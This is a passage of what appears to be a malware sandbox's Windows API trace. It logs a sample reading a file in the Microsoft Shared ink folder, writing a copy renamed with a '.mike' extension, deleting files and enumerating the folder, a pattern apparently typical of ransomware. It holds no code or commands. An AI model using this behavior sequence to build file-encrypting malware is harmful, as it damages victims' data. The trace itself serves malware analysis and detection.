Files\\Microsoft Shared\\ink\\ipssve.xml.mike", lpFilePart=0x0) returned 0x42 [0044.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.142] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.142] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.142] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.142] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.142] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", lpFilePart=0x0) returned 0x42 [0044.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0044.142] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0044.143] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", lpFilePart=0x0) returned 0x42 [0044.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0044.143] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.143] GetFileType (hFile=0x264) returned 0x1 [0044.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0044.143] GetFileType (hFile=0x264) returned 0x1 [0044.143] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0044.143] WriteFile (in: hFile=0x264, lpBuffer=0x2268050*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2268050*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0044.144] CloseHandle (hObject=0x264) returned 1 [0044.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0044.144] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), fInfoLevelId=0x0, lpFileInformation=0x2267b94 | out: lpFileInformation=0x2267b94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27decc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27decc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d8)) returned 1 [0044.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0044.145] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0044.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.145] GetFileType (hFile=0x264) returned 0x1 [0044.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0044.145] GetFileType (hFile=0x264) returned 0x1 [0044.145] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0044.145] ReadFile (in: hFile=0x264, lpBuffer=0x2269164, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2269164*, lpNumberOfBytesRead=0x2af0c8*=0x9d8, lpOverlapped=0x0) returned 1 [0044.148] CloseHandle (hObject=0x264) returned 1 [0044.148] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", lpFilePart=0x0) returned 0x42 [0044.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0044.148] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.149] GetFileType (hFile=0x264) returned 0x1 [0044.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0044.149] GetFileType (hFile=0x264) returned 0x1 [0044.149] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0044.149] WriteFile (in: hFile=0x264, lpBuffer=0x226fb1c*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x226fb1c*, lpNumberOfBytesWritten=0x2af0bc*=0x9e0, lpOverlapped=0x0) returned 1 [0044.149] CloseHandle (hObject=0x264) returned 1 [0044.150] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", lpFilePart=0x0) returned 0x42 [0044.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0044.150] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.150] GetFileType (hFile=0x264) returned 0x1 [0044.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0044.150] GetFileType (hFile=0x264) returned 0x1 [0044.151] WriteFile (in: hFile=0x264, lpBuffer=0x2272d30*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2272d30*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0044.151] CloseHandle (hObject=0x264) returned 1 [0044.152] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.152] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", lpFilePart=0x0) returned 0x42 [0044.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.152] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe483b1e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe483b1e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4861340, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc00)) returned 1 [0044.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.152] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.152] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", lpFilePart=0x0) returned 0x42 [0044.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0044.152] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22743e0 | out: lpFileInformation=0x22743e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe483b1e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe483b1e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4861340, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc00)) returned 1 [0044.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0044.153] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.153] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", dwFileAttributes=0x80) returned 0 [0044.154] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.154] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", lpFilePart=0x0) returned 0x42 [0044.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0044.154] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe483b1e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe483b1e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4861340, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc00)) returned 1 [0044.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0044.154] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.154] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", lpFilePart=0x0) returned 0x42 [0044.154] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.mike")) returned 1 [0044.155] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll", lpFilePart=0x0) returned 0x3e [0044.155] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll", lpFilePart=0x0) returned 0x3d [0044.155] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll", lpFilePart=0x0) returned 0x44 [0044.155] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe", lpFilePart=0x0) returned 0x3a [0044.155] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll", lpFilePart=0x0) returned 0x3c [0044.155] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll", lpFilePart=0x0) returned 0x3e [0044.156] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll", lpFilePart=0x0) returned 0x40 [0044.156] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll", lpFilePart=0x0) returned 0x3d [0044.156] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe", lpFilePart=0x0) returned 0x45 [0044.156] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll", lpFilePart=0x0) returned 0x3f [0044.156] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll", lpFilePart=0x0) returned 0x3d [0044.156] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe", lpFilePart=0x0) returned 0x3d [0044.156] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll", lpFilePart=0x0) returned 0x3e [0044.156] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll", lpFilePart=0x0) returned 0x3d [0044.156] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll", lpFilePart=0x0) returned 0x3e [0044.156] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll", lpFilePart=0x0) returned 0x3f [0044.157] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll", lpFilePart=0x0) returned 0x3d [0044.157] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll", lpFilePart=0x0) returned 0x3c [0044.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0044.157] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", lpFilePart=0x0) returned 0x32 [0044.157] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpFilePart=0x0) returned 0x33 [0044.157] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe483b1e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4861340, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0044.157] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe483b1e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4861340, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.157] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2bbccc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c2bbccc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc1486, dwReserved0=0x0, dwReserved1=0x0, cFileName="Alphabet.xml", cAlternateFileName="")) returned 1 [0044.157] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0044.158] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0044.158] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90daefa5, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x90daefa5, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0044.158] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c92176b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c92176b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xdd6ec0f0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x2f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ConvertInkStore.exe", cAlternateFileName="")) returned 1 [0044.158] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0044.158] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0044.158] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0044.158] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0044.158] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: 